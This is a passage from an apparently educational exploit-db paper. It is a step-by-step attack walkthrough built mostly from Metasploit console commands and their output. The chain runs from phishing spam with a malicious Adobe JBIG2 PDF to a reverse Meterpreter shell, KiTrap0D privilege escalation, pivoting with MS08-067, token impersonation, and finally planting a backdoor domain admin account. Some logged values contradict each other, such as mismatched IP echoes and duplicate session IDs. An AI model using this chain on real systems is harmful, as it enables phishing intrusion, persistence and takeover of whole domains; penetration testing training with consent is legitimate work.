Many SPAM Mail to victims mail then waiting for connection. We used Adobe JBIG2Decode Vulnerability that affect Ad :MISSION: SPAM Mails 1. Zea3ul ---------------------> Victim@abc.com (Open PDF and Reverse Shell back to Zeq3ul) ^ | | | --------------------------------/ Reverse Meterpreter Shell 2. Zeq3ul Get Meterpreter shell with USERs Priv, Then Exploit Local kernel with KiTrap0D to SYSTEMs Priv. 3. Zeq3ul Can full compromise victim system, Then Pivot Network and Attack other machine that joined Domain Controller 4. Compromise Domain Controller and all systems. Victory !!!8 of 12 12/24/10 5:52 PM
  9. 9. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/13621/ [MSF Result]--------------------------------------------------------------------------------- bt framework3 # msfconsole ____________ < metasploit > ------------ ,__, (oo)____ (__) ) ||--|| * =[ metasploit v3.3.4-dev [core:3.3 api:1.0] + -- --=[ 490 exploits - 226 auxiliary + -- --=[ 192 payloads - 23 encoders - 8 nops =[ svn r8091 updated 39 days ago (2010.01.09) Warning: This copy of the Metasploit Framework was last updated 39 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: http://www.metasploit.com/redmine/projects/framework/wiki/Updating msf > use windows/fileformat/adobe_jbig2decode msf exploit(adobe_jbig2decode) > set TARGET 0 TARGET => 0 msf exploit(adobe_jbig2decode) > set FILENAME malfile.pdf FILENAME => malfile.pdf msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(adobe_jbig2decode) > set LHOST 192.168.80.131 LHOST => 192.168.80.131 msf exploit(adobe_jbig2decode) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Creating malfile.pdf file... [*] Generated output file /pentest/exploits/framework3/data/exploits/malfile.pdf [*] Exploit completed, but no session was created. msf exploit(adobe_jbig2decode) > back msf > use exploit/multi/handler msf exploit(handler) > set LHOST 192.168.163.137 LHOST => 192.168.163.137 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit -j [*] Exploit running as background job. msf exploit(handler) > [*] Starting the payload handler... [*] Started reverse handler on port 4444 [*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (192.168.163.137:4444 -> 192.168.163.133:1156) msf exploit(hanler) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.163.137:4444 -> 192.168.163.133:1156 msf exploit(handler) > session -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: WINXPcwh meterpreter > use priv Loading extension priv...success. meterpreter > run kitrap0d [*] Currently running as WINXPcwh [*] Loading the vdmallowed executable and DLL from the local system... [*] Uploading vdmallowed to C:DOCUME~1cwhLOCALS~1TempkaZZPD.exe... [*] Uploading vdmallowed to C:DOCUME~1cwhLOCALS~1Tempvdmexploit.dll... [*] Escalating our process (PID:3248)... -------------------------------------------------- Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit -------------------------------------------- taviso@sdf.lonestar.org --- [?] GetVersionEx() => 5.1 [?] NtQuerySystemInformation() => WINDOWSsystem32ntkrnlpa.exe@804D7000 [?] Searching for kernel 5.1 signature: version 2... [+] Trying signature with index 3 [+] Signature found 0x288de bytes from kernel base [+] Starting the NTVDM subsystem by launching MS-DOS executable [?] CreateProcess("C:WINDOWStwunk_16.exe") => 1204 [?] OpenProcess(1204) => 0x7e8 [?] Injecting the exploit thread into NTVDM subsystem @0x7e8 [?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14); [?] WaitForSingleObject(0x7d4, INFINITE); [?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074 [+] The exploit thread reports exploitation was successful [+] w00t! You can now use the shell opened earlier [*] Deleting files... [*] Now running as NT AUTHORITYSYSTEM meterpreter > getuid Server username: NT AUTHORITYSYSTEM meterpreter > exit9 of 12 12/24/10 5:52 PM
  10. 10. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/13621/ meterpreter > route Network routes ============== Subnet Netmask Gateway ------ ------- ------- 0.0.0.0 0.0.0.0 192.211.163.2 127.0.0.0 255.0.0.0 127.0.0.1 192.211.163.0 255.255.255.0 192.211.163.133 192.211.163.133 255.255.255.255 127.0.0.1 192.211.163.255 255.255.255.255 192.211.163.133 224.0.0.0 240.0.0.0 192.211.163.133 255.255.255.255 255.255.255.255 192.211.163.133 meterpreter > Background session 1? [y/N]y msf exploit(handler) > route add 192.211.163.0 255.255.255.0 1 msf exploit(handler) > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 192.211.163.0 255.255.255.0 Session 1 msf exploit(handler) > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp PAYLOAD => windows/patchupmeterpreter/reverse_tcp msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/patchupmeterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set RHOST 192.211.163.140 RHOST => 10.211.55.128 msf exploit(ms08_067_netapi) > set LPORT 5000 LPORT => 5000 msf exploit(ms08_067_netapi) > set LHOST 192.168.163.137 LHOST => 10.10.1.109 msf exploit(ms08_067_netapi) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Automatically detecting the target... [[*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (205835 bytes)... [*] Upload completed. [*] Meterpreter session 2 opened (192.168.163.137:5000 -> 192.168.163.133:1233) meterpreter > Background session 2? [y/N]y msf exploit(ms08_067_netapi) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.163.137:4444 -> 192.168.163.133:1156 1 Meterpreter 192.168.163.137:5000 -> 192.168.163.133:1233 //We used PIVOT Technique to cross around network and successfully routed our exploit to the 192.211.163.0/24 network,successfully compromised host //If you notice it says that 192.168.163.137 is connected to 192.168.163.133, note that we did a reverse payload and that 192.168.163.133 is the ex //Lets Compromise Domain Controller. msf exploit(ms08_067_netapi) > sessions -i 2 [*] Starting interaction with 2... meterpreter > shell Process 15484 created. Channel 1 created. Micorsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWSsystem32>net user net user User accounts for 10 of 12 12/24/10 5:52 PM
  11. 11. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/13621/ ------------------------------------------------------------------------------- abcxyz admin Administrator ASPNET csadmin Guest IUSR_HDB1 IWAM_HDB1 SUPPORT_388945a0 The command completed with one or more errors. C:WINDOWSsystem32>net group "domain admins" /domain net group "domain admins" /domain The request will be processed at a domain controller for domain clqa.loc. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Adit.Pr Administrator Chal.Ar Chal.Are john.sm Kai.om kitti.admin pom.sri The command completed successfully. C:WINDOWSsystem32>exit meterpreter > use incognito Loading extension incognito...success. meterpreter > list_tokens -u Delegation Tokens Available ======================================== CLQACLESB.Service CLQARS.service NT AUTHORITYLOCAL SERVICE NT AUTHORITYNETWORK SERVICE NT AUTHORITYSYSTEM Impersonation Tokens Available ======================================== CLQApom.sri CLQAjohn.sm NT AUTHORITYANONYMOUS LOGON meterpreter > impersonate_token CLQApom.sri [-] No delegation token available [+] Successfully impersonated user CLQApom.sri meterpreter > getuid Server username: CLQApom.sri meterpreter > execute -i -f cmd.exe -t Process 14992 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:WINDOWSsystem32>whoami whoami clqapom.sri C:WINDOWSsystem32>net user zeq3ul 5plus4=10 /add /domain net user zeq3ul 5plus4=10 /add /domain The request will be processed at a domain controller for domain clqa.loc. The command completed successfully. C:WINDOWSsystem32>net group "domain admins" zeq3ul /add /domain net group "domain admins" zeq3ul /add /domain The request will be processed at a domain controller for domain clqa.loc. The command completed successfully. C:WINDOWSsystem32>net group "domain admins" /domain net group "domain admins" /domain The request will be processed at a domain controller for domain clqa.loc. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Adit.Pr Administrator Chal.Ar Chal.Are john.sm Kai.om kitti.admin pom.sri zeq3ul The command completed successfully. C:WINDOWSsystem32>exit [End Result]------------------------------------------------------------------------------------ From Result, We can conclude that We must compromise only 1 machine that joined domain then impersonate token to "Domain admins", Add user "Domain admins" group. Now we compromise all system that joined Domain controller. Mission Accomplished !!!! ##################### [0x04] - References ##################### [1] Zero Cold@intern0t.net [2] http://carnal0wnage.attackresearch.com [3] http://blog.metasploit.com/ [4] Metasploit Unleashed11 of 12 12/24/10 5:52 PM
  12. 12. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/13621/ [5] Full Scope Security Attacking Layer 8 #################### [0x05] - Greetz To #################### Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK Special Thx : asylu3, str0ke, citec.us, exploit-db.com ---------------------------------------------------- This paper is written for Educational purpose only. The authors are not responsible for any damage originating from using this paper in wrong objective. If you want to use this knowledge with other person systems, you must request for consent from system owner before ---------------------------------------------------- © Offensive Security 201012 of 12 12/24/10 5:52 PM

×